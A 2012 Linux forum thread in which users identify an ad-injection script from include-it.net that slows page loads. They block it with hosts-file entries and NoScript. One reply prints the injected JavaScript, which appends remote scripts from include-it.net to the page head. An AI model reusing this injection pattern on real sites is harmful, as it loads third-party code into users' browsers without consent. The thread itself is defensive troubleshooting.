Author Topic: this "include-it.net", what the...  (Read 1564 times)

Offline sammy2fish

  • Hero Member
  • *****
  • Posts: 3309
  • from the Prairies... Canadian MLU
this "include-it.net", what the...
« on: December 29, 2012, 08:13:15 AM »
Why is this thing coming up & delaying the load, when I click on the forum link?
One of the few things I've learnt as growing older.  Is to choose your battles.. but never loose sight of the war..!

Offline YouCanToo

  • PCLinuxOS Tester
  • Hero Member
  • *******
  • Posts: 5383
  • Location: Lebanon, OR., USA
    • Spreading the word.......
Re: this "include-it.net", what the...
« Reply #1 on: December 29, 2012, 03:13:46 PM »
It is a effing script for ad injection

Code: [Select]

var script = document.createElement('script');script.type = 'text/javascript';script.characterSet = 'utf-8';script.src = '[url=http://Include-it.net/JS/includeit.js?v=1.4.9';document.getElementsByTagName('head')]http://Include-it.net/JS/includeit.js?v=1.4.9';
document.getElementsByTagName('head')[/url][0].appendChild(script);var InfraAdInjectPublisherCountryID = 1; var InfraAdInjectDate = '12/29/2012 5:08:59 PM'; var InfraAdInjectPublisherID = 0;
var InfraAdInjectPublisherSubID = ''; var InfraAdInjectPublisherFeedID = 62; var InfraAdInjectPublisherProviderID = 1; var IntextUseMetaKeyWord = true; var IntextUseCookieSearch = false;
var InfraSearchKeyWords = '';var script = document.createElement('script');script.type = 'text/javascript';script.characterSet = 'utf-8';script.src = '
[url=http://Include-it.net/JS/In-Text-InfraAd.min.js?v=1.4.9';document.getElementsByTagName('head')]http://Include-it.net/JS/In-Text-InfraAd.min.js?v=1.4.9';
document.getElementsByTagName('head')[/url][0].appendChild(script);var InfraProviderID = '1';var InfraPublisherID = '0';var script = document.createElement('script');
script.type = 'text/javascript';script.characterSet = 'utf-8';script.src = '[url=http://Include-it.net/JS/In-Text-ChangeOnclikButton.min.js?v=1.4.9';
document.getElementsByTagName('head')]http://Include-it.net/JS/In-Text-ChangeOnclikButton.min.js?v=1.4.9';
document.getElementsByTagName('head')[/url][0].appendChild(script);


Guess I will be adding this "http://Include-it.net" to my hosts.deny file.





« Last Edit: December 29, 2012, 03:18:54 PM by YouCanToo »




Be sure to visit the NEW Knowledge Base


Linux is user-friendly- it's just picky who its friends are!

Offline sammy2fish

  • Hero Member
  • *****
  • Posts: 3309
  • from the Prairies... Canadian MLU
Re: this "include-it.net", what the...
« Reply #2 on: December 29, 2012, 04:44:07 PM »
It is a f-ing script for ad injection... you got that right..!

It is still there after I posted this.... grrrrr
One of the few things I've learnt as growing older.  Is to choose your battles.. but never loose sight of the war..!

Offline snoz

  • Jr. Member
  • **
  • Posts: 18
Re: this "include-it.net", what the...
« Reply #3 on: December 29, 2012, 05:20:54 PM »
That's where "noscript" come in handy  ;) :)

Offline sammy2fish

  • Hero Member
  • *****
  • Posts: 3309
  • from the Prairies... Canadian MLU
Re: this "include-it.net", what the...
« Reply #4 on: December 29, 2012, 05:25:00 PM »
Ok... I put in a PCLOS dvd, and booted.

Went to windows and deleted all temp, history, cache files.

Re-booted back into win7 (dual-boot), and the "include-it" in Firefox is still there.

Where can a person GET rid of it???
One of the few things I've learnt as growing older.  Is to choose your battles.. but never loose sight of the war..!

Offline Linux-Blue

  • Sr. Member
  • ****
  • Posts: 384
  • (Formerly known as Vanguard-741)
Re: this "include-it.net", what the...
« Reply #5 on: December 29, 2012, 05:37:23 PM »
I'm not seeing anything here. no delays of any kind.
Technology changes. Human nature doesn't." -me

Offline sammy2fish

  • Hero Member
  • *****
  • Posts: 3309
  • from the Prairies... Canadian MLU
Re: this "include-it.net", what the...
« Reply #6 on: December 29, 2012, 05:51:45 PM »
Ok... I shall repent.

It was only when I was rebooting in windoze.

Re-booted the computer in Linux several times and no problems.
One of the few things I've learnt as growing older.  Is to choose your battles.. but never loose sight of the war..!

Offline YouCanToo

  • PCLinuxOS Tester
  • Hero Member
  • *******
  • Posts: 5383
  • Location: Lebanon, OR., USA
    • Spreading the word.......
Re: this "include-it.net", what the...
« Reply #7 on: December 29, 2012, 09:43:56 PM »
Ok... I put in a PCLOS dvd, and booted.

Went to windows and deleted all temp, history, cache files.

Re-booted back into win7 (dual-boot), and the "include-it" in Firefox is still there.

Where can a person GET rid of it???



There is also a file called "hosts" in windows.  You could possible use that file to block it. You would add a line in that file like this

127.0.0.1     include-it.net
127.0.0.1     www.include-it.net

Save the file and reboot winders.




Be sure to visit the NEW Knowledge Base


Linux is user-friendly- it's just picky who its friends are!

Offline sammy2fish

  • Hero Member
  • *****
  • Posts: 3309
  • from the Prairies... Canadian MLU
Re: this "include-it.net", what the...
« Reply #8 on: December 31, 2012, 07:54:52 PM »
YouCanToo, thanks.  I give that a try.
One of the few things I've learnt as growing older.  Is to choose your battles.. but never loose sight of the war..!

Offline YouCanToo

  • PCLinuxOS Tester
  • Hero Member
  • *******
  • Posts: 5383
  • Location: Lebanon, OR., USA
    • Spreading the word.......
Re: this "include-it.net", what the...
« Reply #9 on: December 31, 2012, 08:22:18 PM »
I found that using a Google search about windows host file.  I have never used the hosts file in Windows before only in Linux and it is amazing what kind of tricks you can do using the hosts file in Linux.




Be sure to visit the NEW Knowledge Base


Linux is user-friendly- it's just picky who its friends are!